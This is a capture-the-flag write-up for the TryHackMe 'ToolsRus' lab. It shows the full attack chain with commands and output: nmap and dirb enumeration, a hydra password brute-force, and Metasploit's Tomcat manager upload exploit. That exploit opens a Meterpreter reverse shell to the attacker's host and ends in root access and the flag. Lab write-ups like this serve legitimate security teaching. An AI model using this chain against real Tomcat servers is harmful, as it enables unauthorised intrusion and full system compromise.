ToolsRus CTF | write-up

Hello all, today's challenge is made by Tryhackme.com, it's a fun CTF ratted as easy, totally straight forward.

Let's enumerate the machine

root@kali:~# nmap -sC -sV 10.10.27.83
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-03 13:36 UTC
Nmap scan report for ip-10-10-27-83.eu-west-1.compute.internal (10.10.27.83)
Host is up (0.0067s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5d:ea:73:8e:0b:06:60:eb:6f:57:dd:99:f8:33:3d:67 (RSA)
|   256 b6:2c:cb:68:c2:ff:d5:3b:5b:ac:4a:66:b5:d8:6d:33 (ECDSA)
|_  256 93:6c:db:4f:5b:2f:a2:83:1f:3d:b0:f6:5f:03:d7:5f (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1234/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
MAC Address: 02:D0:62:08:8F:98 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds
root@kali:~# 

we have 22 SSH, 80 HTTP, and another HTTP on 1234 running Tomcat and 8009 for ajp13 let's have a look what we are dealing with on 80 and check if there's any open directories so we can understand more what we are trying to break

root@kali:~# dirb http://10.10.27.83

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Apr  3 13:39:07 2020
URL_BASE: http://10.10.27.83/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.27.83/ ----
==> DIRECTORY: http://10.10.27.83/guidelines/                                      
+ http://10.10.27.83/index.html (CODE:200|SIZE:168)                                
+ http://10.10.27.83/protected (CODE:401|SIZE:458)                                 
+ http://10.10.27.83/server-status (CODE:403|SIZE:299)                             
                                                                                   
---- Entering directory: http://10.10.27.83/guidelines/ ----
+ http://10.10.27.83/guidelines/index.html (CODE:200|SIZE:51)                      
                                                                                   
-----------------
END_TIME: Fri Apr  3 13:39:12 2020
DOWNLOADED: 9224 - FOUND: 4
root@kali:~# 

and we have a message in directory /guidelines for Mr bob that forgot maybe to update the Tomcat server and another one /protected that tells us that we are visiting the wrong port, that's fine because we have more in port 1234

root@kali:~# hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.27.83 http-get /protected
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-03 13:53:17
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.10.27.83:80/protected
[80][http-get] host: 10.10.27.83   login: bob   password: xxxxxxx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-03 13:53:19
root@kali:~# 

so we know the user and we brute forced the password with hydra let's dig more and see what we can do with our results so far

the version we are on it accepts some code execution and already exist in metasploit which means less work for us, It's all right to be lazy sometimes ...

msf5 exploit(multi/http/tomcat_mgr_upload) > show options 

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  xxxxxxx          no        The password for the specified username
   HttpUsername  bob              no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.10.27.83      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         1234             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.152.253    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.10.152.253:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying kDC5cLvVGr0Ljgc6SbP4zI0e0sf...
[*] Executing kDC5cLvVGr0Ljgc6SbP4zI0e0sf...
[*] Undeploying kDC5cLvVGr0Ljgc6SbP4zI0e0sf ...
[*] Sending stage (53906 bytes) to 10.10.27.83
[*] Meterpreter session 1 opened (10.10.152.253:4444 -> 10.10.27.83:47080) at 2020-04-03 14:12:10 +0000

meterpreter >

and we have a shell, so technically what happened the script logged in went to /manager and uploaded a war file and gave us an easy lazy reverse shell and not any shell a root user shell ...

meterpreter > getuid
Server username: root
meterpreter > shell
Process 4 created.
Channel 4 created.
ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
python -c 'import pty;pty.spawn("/bin/bash")'
root@ip-10-10-27-83:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ip-10-10-27-83:/#
root@ip-10-10-27-83:~# ls -la /root
ls -la /root
total 40
drwx------  5 root root 4096 Mar 11  2019 .
drwxr-xr-x 23 root root 4096 Apr  3 13:34 ..
-rw-------  1 root root   47 Mar 11  2019 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root   33 Mar 11  2019 flag.txt
drwxr-xr-x  2 root root 4096 Mar 11  2019 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwxr-xr-x  3 root root 4096 Mar 10  2019 snap
drwx------  2 root root 4096 Mar 10  2019 .ssh
-rw-------  1 root root  658 Mar 11  2019 .viminfo
root@ip-10-10-27-83:~# cat /root/flag.txt
cat /root/flag.txt
ffxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
root@ip-10-10-27-83:~#

and here you are a root guru and you got the flag happy with that, but make sure to focus more on the most important part, is to understand why does it work, why exactly when you ran exploit or run in that msfconsole it gave you back a reverse shell, if you are interested on reading more about this exploit, I will leave the ruby file of the exploit used in metasploit and more details on the exploit itself.

Happy Hacking!

metasploit-framework/tomcat_mgr_upload.rb at master · rapid7/metasploit-framework
Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.
Apache Tomcat Manager Authenticated Upload Code Execution
Rapid7’s VulnDB is curated repository of vetted computer software exploits and exploitable vulnerabilities.
CVE-2009-3548 : The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a
CVE-2009-3548 : The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.